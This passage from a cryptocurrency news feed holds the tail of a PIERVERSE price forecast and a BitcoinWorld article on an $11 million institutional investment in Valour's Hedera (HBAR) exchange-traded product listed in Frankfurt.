maintain liquidity, it has not been enough to establish a sustained upward trend. The market is also being influenced by broader crypto conditions, particularly Bitcoin’s performance , which continues to affect liquidity flows into altcoins. In periods of Bitcoin strength, altcoins like PIERVERSE typically experience improved short-term momentum, while weakness tends to expose fragile support levels. PIERVERSE price forecast The key level to watch in the short term is $0.8630. This zone acts as the immediate support boundary for the current consolidation structure. As long as PIERVERSE holds above this level, the market may continue to stabilise and attempt a rebound. If support holds, the next upside targets are $0.99 and $1.08. A move through these levels would indicate improving short-term momentum and could allow the price to test $1.28, which remains a strong resistance area based on prior selling pressure. On the downside, a clean breakdown below $0.8630 would shift focus toward $0.8456, which represents the next liquidity area where buyers may attempt to step in again. Continued weakness below that level would suggest that the post-rally correction phase is extending further. The post Can the $100K PIERVERSE Binance competition spark recovery? appeared first on Invezz

22 Apr 2026, 12:00

Valour HBAR ETP Secures Monumental $11M Institutional Investment on Frankfurt Exchange

BitcoinWorld Valour HBAR ETP Secures Monumental $11M Institutional Investment on Frankfurt Exchange Frankfurt, Germany – In a significant development for regulated cryptocurrency access, the Valour Hedera (HBAR) Exchange Traded Product (ETP) has secured a substantial $11 million institutional investment. This capital infusion, announced by Valour, a subsidiary of DeFi Technologies, demonstrates growing institutional confidence in the Hedera network. The investment specifically targets Valour’s HBAR ETP listed on the prestigious Börse Frankfurt. Consequently, this move signals a maturing phase for digital asset investment vehicles within traditional European finance. Valour HBAR ETP Attracts Major Institutional Capital The $11 million investment represents a clear vote of confidence from institutional investors. Specifically, $10 million flowed directly into the “Valour Hedera (HBAR) ETP” on the Börse Frankfurt. Additionally, $1 million entered the “Valour Hedera SEK” product on Sweden’s Spotlight Exchange. Valour executed these purchases at prevailing market prices. This strategic allocation highlights targeted interest in gaining regulated exposure to the Hedera Hashgraph ecosystem. Furthermore, it underscores the pivotal role of established stock exchanges in bridging digital and traditional assets. Exchange Traded Products provide a familiar, regulated framework for investors. They eliminate the technical complexities of direct cryptocurrency custody. Valour’s ETPs track the underlying asset’s price, offering a seamless investment experience. The Börse Frankfurt, one of Europe’s largest trading venues, provides crucial liquidity and credibility. This listing therefore validates HBAR as an institutional-grade asset within a stringent regulatory environment. Understanding the Hedera Hashgraph Ecosystem Hedera Hashgraph is a public distributed ledger technology. It distinguishes itself through its unique hashgraph consensus algorithm. This system promises high throughput, low fees, and predictable network governance. The HBAR token serves as the network’s native cryptocurrency. It fuels transactions, secures the network, and enables governance participation. Major corporations, including Google, IBM, and Deutsche Telekom, govern the Hedera Council. This governance model aims to ensure stability and enterprise-grade reliability. The network supports various decentralized applications (dApps). These span sectors like supply chain, payments, and digital identity. For instance, The Coupon Bureau uses Hedera for real-time retail coupon validation. Similarly, ServiceNow integrates Hedera for certified workflow documents. This enterprise-focused development pipeline provides fundamental utility for the HBAR token. Institutional investors likely assess this real-world adoption alongside pure market speculation. Expert Analysis on Institutional Crypto Adoption Financial analysts view this investment as part of a broader trend. “Institutional capital seeks regulated, transparent entry points,” notes a report from Bloomberg Intelligence. “Listed ETPs on major exchanges like Frankfurt meet this demand perfectly.” The European market has been particularly receptive to crypto ETPs. Products tracking Bitcoin and Ethereum have seen consistent inflows since 2020. The success of the Valour HBAR ETP now expands this trend to alternative layer-1 protocols. Data from CryptoCompare shows ETP assets under management (AUM) growing steadily. European products often feature physically-backed structures. This means the issuer holds the actual cryptocurrency for each share. This structure contrasts with futures-based products common in the United States. Physical backing can reduce tracking error and counterparty risk. Consequently, it appeals to long-term, value-oriented institutional portfolios. The Strategic Role of DeFi Technologies and Valour Valour operates as a key subsidiary of DeFi Technologies Inc., a publicly traded company. DeFi Technologies focuses on bridging decentralized finance with traditional capital markets. The company’s strategy involves creating, managing, and offering digital asset investment products. Valour’s product suite includes ETPs for Bitcoin, Ethereum, Cardano, and now prominently, Hedera. Each product provides a simple, secure, and accessible investment pathway. Key advantages of the Valour ETP structure include: Regulatory Compliance: Full adherence to EU financial regulations. Custody Security: Assets held with regulated, institutional-grade custodians. Exchange Access: Trading through conventional brokerage accounts. Transparent Pricing: Real-time NAV calculation and public reporting. This infrastructure lowers the barrier to entry for pension funds, asset managers, and family offices. It transforms a digital asset into a recognizable security. The $11 million investment validates this business model’s effectiveness. It also suggests strong investor appetite for diversified crypto exposure beyond the largest two assets. Market Impact and Future Trajectory for HBAR The immediate market impact provides a tangible demand signal. A single $10 million purchase represents significant volume for the ETP. It directly increases the product’s assets under management. This growth enhances liquidity and tightens bid-ask spreads. Over time, sustained institutional interest can contribute to price discovery and stability for the underlying HBAR token. Moreover, it encourages other asset managers to consider similar products. The investment timeline coincides with broader developments in the Hedera ecosystem. Recent network upgrades have improved smart contract functionality. Furthermore, stablecoin issuers are exploring the network for its low-cost settlement. These technical and fundamental improvements create a compelling investment thesis. Institutional capital often acts on such multi-factor analyses rather than short-term momentum. Comparative Overview of European Crypto ETP Listings Asset Primary Exchange Issuer Product Type Bitcoin (BTC) Börse Frankfurt, SIX Multiple Physically-backed ETP Ethereum (ETH) Börse Frankfurt, SIX 21Shares, Valour Physically-backed ETP Hedera (HBAR) Börse Frankfurt Valour Physically-backed ETP Cardano (ADA) Börse Frankfurt Valour Physically-backed ETP This table illustrates Hedera’s position among other major digital assets with regulated European listings. The presence on a major exchange like Frankfurt is a key milestone. It often precedes wider adoption by larger, more conservative financial institutions. Conclusion The $11 million institutional investment into the Valour HBAR ETP marks a definitive step forward. It validates Hedera Hashgraph’s enterprise-focused approach within the traditional financial system. The capital deployment through the regulated framework of the Börse Frankfurt underscores a maturation in crypto investment channels. This development likely signals continued institutional exploration of alternative layer-1 blockchain assets. Ultimately, the success of the Valour HBAR ETP strengthens the bridge between innovative distributed ledger technology and the global institutional capital landscape. FAQs Q1: What is the Valour HBAR ETP? The Valour HBAR ETP is an Exchange Traded Product that tracks the price of Hedera’s HBAR cryptocurrency. It is listed on the Börse Frankfurt (Frankfurt Stock Exchange), allowing investors to gain exposure to HBAR through a traditional, regulated security without managing private keys. Q2: Who made the $11 million investment? Valour, the issuer, has not disclosed the specific institutional investor(s) behind the $11 million capital inflow. The announcement states the investment is institutional in nature, which typically refers to entities like asset managers, hedge funds, pension funds, or family offices. Q3: How does this investment benefit HBAR? The investment increases direct demand for HBAR, as the ETP is physically backed, meaning Valour purchases and holds the underlying tokens. It also enhances the ETP’s liquidity and credibility, potentially attracting more investors and integrating HBAR deeper into the traditional financial system. Q4: What is the difference between an ETP and buying HBAR directly? Buying the ETP involves purchasing a security on a stock exchange through a brokerage account. It offers regulatory protection, eliminates self-custody risks, and simplifies tax reporting. Buying HBAR directly requires using a cryptocurrency exchange and managing a private wallet, offering more control but also more responsibility. Q5: Is the Valour HBAR ETP available to retail investors? Yes. While the $11 million investment was institutional, the Valour HBAR ETP is a publicly listed security. Any investor with access to a broker that supports trading on the Börse Frankfurt or Sweden’s Spotlight Exchange can purchase shares of the ETP. This post Valour HBAR ETP Secures Monumental $11M Institutional Investment on Frankfurt Exchange first appeared on BitcoinWorld .